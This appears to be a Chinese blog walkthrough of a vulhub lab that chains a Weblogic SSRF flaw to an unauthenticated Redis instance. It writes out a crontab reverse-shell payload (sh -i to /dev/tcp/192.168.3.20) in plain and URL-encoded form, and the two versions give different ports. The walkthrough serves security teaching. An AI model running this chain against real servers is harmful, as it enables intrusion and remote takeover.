Weblogic SSRF 到Getshell

Weblogic SSRF漏洞

描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,进而攻击内网redis/fastcgi等脆弱组件。

1.环境搭建

环境采用vulhub的docker环境

启动环境路径

vulhub/weblogic/ssrf

启动环境命令

docker-compose build

docker-compose up -d 

访问http://your-ip:7001/uddiexplorer/  无需登录即可查看uddiexploer应用

2.SSRF漏洞测试

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp

Weblogic SSRF 到Getshell

用burpsuite进行抓包查看漏洞出现的参数请求位置。

Weblogic SSRF 到Getshell

更改参数我们发现服务器返回404虽然报错了。但是证明服务器是存在的。

Weblogic SSRF 到Getshell

如果我们给出一个不存在的端口服务器会返回午饭获取服务器HTTP响应。

通过错误的不同可以探测内网的状态

3.探测内网redis服务器:

Weblogic SSRF 到Getshell

这里我们探测的时候,如果响应时间久我们就认为是不存在,一般docker环境下IP为172.*根据ipconfig查看的几个容器IP进行遍历探测。

4.内网Redis未授权访问漏洞Getshell

我们使用的反弹shell脚本如下

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.3.20/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行URL编码

/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.20%2F7777%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

构造请求包

Weblogic SSRF 到Getshell

NC监听

Weblogic SSRF 到Getshell

 

 

上一篇:记一次从盲SSRF到RCE


下一篇:七种常见的字符串格式化方法